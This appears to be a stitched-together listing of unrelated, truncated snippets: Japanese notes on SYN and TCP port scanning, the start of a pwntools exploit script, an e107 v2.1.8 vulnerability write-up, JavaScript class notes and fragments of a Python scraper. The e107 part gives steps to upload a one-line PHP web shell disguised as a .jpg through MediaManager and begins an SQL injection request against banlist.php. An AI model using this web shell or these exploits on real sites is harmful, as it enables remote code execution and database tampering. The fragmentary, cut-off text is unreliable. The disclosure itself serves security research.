- SYNスキャンとTCPスキャン
- TCPスキャン
- スリーウェイハンドシェイクのシーケンスが実行される
- 通信が確立されてしまうので、ログに残りやすい
- SYNスキャン
- 完全なTCP接続の確立を行わない
- ハーフオープンスキャン、ステルススキャンとも呼ばれる
- SYNパケットを送りつけて、SYN/ACKが返ってきたら稼働中とする
- TCPスキャン
from pwn import * | |
import sys | |
username_addr = 0x6020C0 | |
password_addr = 0x6020E0 | |
call_printf_addr = 0x04009B6 | |
pop_rdi = 0x0000000000400B03 # pop rdi ; ret | |
with open("username_payload", "wb") as f: |
MediaManager of e107 v2.1.8 contains a flaw that is triggered as file types and extensions for uploaded files are not properly validated before being placed in a user-accessible path. This may allow a remote attacker to upload a file and then request it in order to execute arbitrary code with the privileges of the web service.
-
Login to the admin page (
/e107_admin/admin.php
) and access MediaManager. -
Make a backdoor PHP file named "backdoor.jpg" to bypass JavaScript filter and select it on MediaManeger.
<?php system($_GET['q']) ?>
e107 v2.1.8 contains a flaw that may allow carrying out an SQL injection attack. The issue is due to the /e107_admin/banlist.php
script not properly escaping input to the old_ip
parameter. This may allow a remote attacker to inject or manipulate SQL queries in the database, allowing for the manipulation or disclosure of arbitrary data.
- Login to the admin page. (
/e107_admin/admin.php
) - Send a POST request to
/e107_admin/banlist.php
and use BurpSuite to rewrite parameters as follows.
POST /e107/e107_admin/banlist.php HTTP/1.1
Host: localhost:8080
https://developer.mozilla.org/ja/docs/Web/JavaScript/Reference/Classes
- ECMAScript 6で追加された
- 昔はprototypeを利用してクラス的な振る舞いをするオブジェクトを作成することが多かったが、class構文を使えば簡単にクラスを扱うことができる
class Polygon { constructor(height, width) { this.height = height;
from html.parser import HTMLParser | |
from urllib.request import urlopen | |
from datetime import datetime | |
import json | |
import csv | |
import sys | |
import re | |
import os | |
# エラーログのパス |
from html.parser import HTMLParser | |
from urllib.request import urlopen | |
from datetime import datetime | |
import json | |
import csv | |
import sys | |
import re | |
# エラーログのパス | |
ERRORLOG = 'error.log' |